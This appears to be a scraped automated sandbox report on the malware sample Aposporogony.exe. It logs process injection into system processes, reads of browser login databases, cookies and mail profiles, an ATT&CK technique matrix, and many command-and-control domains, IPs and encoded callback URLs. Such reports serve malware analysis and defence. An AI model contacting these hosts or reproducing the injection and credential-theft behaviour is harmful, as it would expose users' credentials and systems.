      Source: C:\Windows\explorer.exeNetwork Connect: 50.87.192.144 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 103.63.2.175 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 195.24.68.23 80Jump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 970000Jump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeSection loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7F4F50000Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7F4F50000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeThread register set: target process: 7648Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 4844Jump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess created: C:\Users\user\Desktop\Aposporogony.exe C:\Users\user\Desktop\Aposporogony.exeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: RAVCpl64.exe, 00000005.00000000.2168568590.0000000000E80000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.6575034943.0000000000E80000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.2176210403.0000000000E80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: RAVCpl64.exe, 00000005.00000000.2168568590.0000000000E80000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.6575034943.0000000000E80000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.2176210403.0000000000E80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: RAVCpl64.exe, 00000005.00000000.2168568590.0000000000E80000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.6575034943.0000000000E80000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.2176210403.0000000000E80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Managerk
      Source: explorer.exe, 00000007.00000000.2540053050.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2617474559.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2470106206.0000000000B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
      Source: RAVCpl64.exe, 00000005.00000000.2168568590.0000000000E80000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.6575034943.0000000000E80000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.2176210403.0000000000E80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      1
      OS Credential Dumping
      3
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium3
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules
      1
      Windows Service
      1
      Access Token Manipulation
      3
      Obfuscated Files or Information
      LSASS Memory5
      System Information Discovery
      Remote Desktop Protocol1
      Data from Local System
      Exfiltration Over Bluetooth21
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Windows Service
      1
      Software Packing
      Security Account Manager121
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      Automated Exfiltration4
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)712
      Process Injection
      1
      DLL Side-Loading
      NTDS12
      Virtualization/Sandbox Evasion
      Distributed Component Object Model1
      Clipboard Data
      Scheduled Transfer15
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
      Masquerading
      LSA Secrets2
      Process Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common12
      Virtualization/Sandbox Evasion
      Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Access Token Manipulation
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job712
      Process Injection
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 751076 Sample: Aposporogony.exe Startdate: 21/11/2022 Architecture: WINDOWS Score: 100 31 xn--29-oj9ik7b890b.net 2->31 33 www.youlian.fund 2->33 35 23 other IPs or domains 2->35 47 Snort IDS alert for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 4 other signatures 2->53 10 Aposporogony.exe 4 37 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 65 Tries to detect Any.run 10->65 14 Aposporogony.exe 6 10->14         started        signatures6 process7 dnsIp8 43 googlehosted.l.googleusercontent.com 142.250.185.161, 443, 49819 GOOGLEUS United States 14->43 45 drive.google.com 142.250.185.78, 443, 49818 GOOGLEUS United States 14->45 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Tries to detect Any.run 14->69 71 Maps a DLL or memory area into another process 14->71 73 2 other signatures 14->73 18 RAVCpl64.exe 14->18 injected signatures9 process10 process11 20 mstsc.exe 13 18->20         started        signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Writes to foreign memory regions 20->59 61 3 other signatures 20->61 23 explorer.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.youlian.fund 154.204.24.45, 49830, 49831, 49832 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 23->37 39 royaltechglobal.com 192.185.32.157, 49834, 49835, 49836 UNIFIEDLAYER-AS-1US United States 23->39 41 14 other IPs or domains 23->41 63 System process connects to network (likely due to code injection or exploit) 23->63 signatures15

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Aposporogony.exe10%VirustotalBrowse
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      7.0.explorer.exe.14253814.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      11.0.firefox.exe.39ec3814.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      11.2.firefox.exe.39ec3814.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      7.0.explorer.exe.14253814.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      7.0.explorer.exe.14253814.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      6.2.mstsc.exe.4913814.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      0.2.Aposporogony.exe.410937.1.unpack100%AviraTR/Patched.Ren.Gen3Download File
      11.0.firefox.exe.39ec3814.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      SourceDetectionScannerLabelLink
      botbillionsblaze.website1%VirustotalBrowse
      www.phootka.ru2%VirustotalBrowse
      xn--29-oj9ik7b890b.net2%VirustotalBrowse
      www.searchbot.su1%VirustotalBrowse
      www.youlian.fund1%VirustotalBrowse
      www.xiaoxiuzhen.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://www.royaltechglobal.com/nqhc/0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-json/0%Avira URL Cloudsafe
      http://www.codemars.academy/nqhc/0%Avira URL Cloudsafe
      http://www.005404.com/nqhc/0%Avira URL Cloudsafe
      http://www.gouldent.site/nqhc/?r4txB=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&1b=S8jD0%Avira URL Cloudsafe
      http://www.labour-office.com/nqhc/?b6=1b9p&r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==0%Avira URL Cloudsafe
      http://www.labour-office.com/nqhc/?r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&1b=S8jD0%Avira URL Cloudsafe
      https://word.office.comW0%Avira URL Cloudsafe
      http://www.xn--29-oj9ik7b890b.net/nqhc/?r4txB=YpBcfthyu6gwcnN/g9jRvpxtfUkdEaz6LsXfXUppEZSnE0c1g3RTY5b27kCACk8vV3w0fGJq4rusk2G49vjJdiO+izISunFXUA==&1b=S8jD0%Avira URL Cloudsafe
      https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
      http://www.botbillionsblaze.website/nqhc/?r4txB=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&1b=S8jD100%Avira URL Cloudmalware
      http://xn--299aa717y.xn--3e0b707e0%Avira URL Cloudsafe
      http://www.gouldent.site/nqhc/0%Avira URL Cloudsafe
      http://www.apidachicago.org/nqhc/0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/feed/0%Avira URL Cloudsafe
      http://www.youlian.fund/nqhc/?r4txB=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&1b=S8jD0%Avira URL Cloudsafe
      http://royaltechglobal.com/nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPm0%Avira URL Cloudsafe
      http://www.005404.com/nqhc/?r4txB=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&1b=S8jD0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/comments/feed/0%Avira URL Cloudsafe
      http://www.royaltechglobal.com/nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jD0%Avira URL Cloudsafe
      http://www.wellnessprodia.com/nqhc/?r4txB=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&1b=S8jD0%Avira URL Cloudsafe
      http://www.codemars.academy/nqhc/?r4txB=HWUkI9TTae9E16Ico4VYIxYl96Wd6gyAbZTC2FoY75Z91OR/nsTZW6u7F26sGGS3r1HZf2jS9pu5KUGpbE/+fGNm2HkM109OTw==&b6=1b9p0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.20%Avira URL Cloudsafe
      http://www.gumba.shop/nqhc/0%Avira URL Cloudsafe
      http://www.phootka.ru/nqhc/?r4txB=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&1b=S8jD0%Avira URL Cloudsafe
      http://www.funknive.ch/nqhc/?r4txB=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&1b=S8jD0%Avira URL Cloudsafe
      www.xiaoxiuzhen.com/nqhc/0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-content/themes/twentytwentytwo/style.css?ver=1.30%Avira URL Cloudsafe
      https://excel.office.comi0%Avira URL Cloudsafe
      http://www.youlian.fund/nqhc/0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/0%Avira URL Cloudsafe
      http://www.labour-office.com/nqhc/0%Avira URL Cloudsafe
      http://www.funknive.ch/nqhc/0%Avira URL Cloudsafe
      http://www.xiaoxiuzhen.com/nqhc/0%Avira URL Cloudsafe
      http://schemas.micro0%Avira URL Cloudsafe
      http://www.botbillionsblaze.website/nqhc/100%Avira URL Cloudmalware
      http://www.searchbot.su/nqhc/?r4txB=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&1b=S8jD0%Avira URL Cloudsafe
      http://www.phootka.ru/nqhc/0%Avira URL Cloudsafe
      http://45.122.138.45/favicon.ico0%Avira URL Cloudsafe
      http://schemas.microso0%Avira URL Cloudsafe
      http://www.searchbot.su/nqhc/0%Avira URL Cloudsafe
      http://www.xiaoxiuzhen.com/nqhc/?r4txB=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&1b=S8jD0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/view.min.js?ver=c24330f635f5cb9d5e0e0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/xmlrpc.php?rsd0%Avira URL Cloudsafe
      http://www.apidachicago.org/nqhc/?r4txB=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&1b=S8jD0%Avira URL Cloudsafe
      http://www.gumba.shop/nqhc/?r4txB=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&1b=S8jD0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/view-modal.min.js?ver=45f05135277abf0%Avira URL Cloudsafe
      http://www.xn--29-oj9ik7b890b.net/nqhc/0%Avira URL Cloudsafe
      https://powerpoint.office.comEMo0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery.min.js?ver=3.6.10%Avira URL Cloudsafe
      http://www.wellnessprodia.com/nqhc/0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      botbillionsblaze.website
      2.57.90.16
      truetrueunknown
      www.phootka.ru
      195.24.68.23
      truetrueunknown
      xn--29-oj9ik7b890b.net
      50.87.192.144
      truetrueunknown
      www.youlian.fund
      154.204.24.45
      truetrueunknown
      www.xiaoxiuzhen.com
      38.55.15.214
      truetrueunknown
      www.searchbot.su
      45.130.41.24
      truetrueunknown
      www.005404.com
      103.63.2.175
      truetrue
        unknown
        www.funknive.ch
        185.101.158.239
        truetrue
          unknown
          www.plentywindshield.com
          96.43.100.185
          truetrue
            unknown
            www.gouldent.site
            66.29.151.40
            truetrue
              unknown
              royaltechglobal.com
              192.185.32.157
              truetrue
                unknown
                drive.google.com
                142.250.185.78
                truefalse
                  high
                  www.labour-office.com
                  45.33.23.183
                  truetrue
                    unknown
                    wellnessprodia.com
                    192.232.217.125
                    truetrue
                      unknown
                      www.gumba.shop
                      3.13.90.76
                      truetrue
                        unknown
                        www.apidachicago.org
                        194.245.148.189
                        truetrue
                          unknown
                          googlehosted.l.googleusercontent.com
                          142.250.185.161
                          truefalse
                            high
                            www.codemars.academy
                            217.160.0.1
                            truetrue
                              unknown
                              doc-00-7s-docs.googleusercontent.com
                              unknown
                              unknownfalse
                                high
                                www.wellnessprodia.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.botbillionsblaze.website
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.noprostatit.store
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.royaltechglobal.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.westinotion.tech
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.xn--29-oj9ik7b890b.net
                                          unknown
                                          unknowntrue
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.royaltechglobal.com/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.xn--29-oj9ik7b890b.net/nqhc/?r4txB=YpBcfthyu6gwcnN/g9jRvpxtfUkdEaz6LsXfXUppEZSnE0c1g3RTY5b27kCACk8vV3w0fGJq4rusk2G49vjJdiO+izISunFXUA==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.labour-office.com/nqhc/?r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.codemars.academy/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.005404.com/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.gouldent.site/nqhc/?r4txB=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.labour-office.com/nqhc/?b6=1b9p&r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.apidachicago.org/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.botbillionsblaze.website/nqhc/?r4txB=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&1b=S8jDtrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.gouldent.site/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.005404.com/nqhc/?r4txB=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.royaltechglobal.com/nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.youlian.fund/nqhc/?r4txB=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.codemars.academy/nqhc/?r4txB=HWUkI9TTae9E16Ico4VYIxYl96Wd6gyAbZTC2FoY75Z91OR/nsTZW6u7F26sGGS3r1HZf2jS9pu5KUGpbE/+fGNm2HkM109OTw==&b6=1b9ptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.wellnessprodia.com/nqhc/?r4txB=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.gumba.shop/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            www.xiaoxiuzhen.com/nqhc/true
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.phootka.ru/nqhc/?r4txB=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.funknive.ch/nqhc/?r4txB=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.youlian.fund/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.labour-office.com/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.funknive.ch/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.xiaoxiuzhen.com/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.botbillionsblaze.website/nqhc/true
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.phootka.ru/nqhc/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.searchbot.su/nqhc/?r4txB=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.xiaoxiuzhen.com/nqhc/?r4txB=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&1b=S8jDtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://doc-00-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aa7vto4aijg1pkg5c538nvekfh9g64qn/1669054650000/00631903678986001080/*/1stXX8Uj1RjHVqk-MVjs7YkPXjSyawEff?e=download&uuid=f9b422c8-2ce3-49b6-9ddb-2eda7c45f4e1false
                                              high
                                              http://www.apidachicago.org/nqhc/?r4txB=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&1b=S8jDtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.searchbot.su/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.gumba.shop/nqhc/?r4txB=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&1b=S8jDtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.xn--29-oj9ik7b890b.net/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.wellnessprodia.com/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
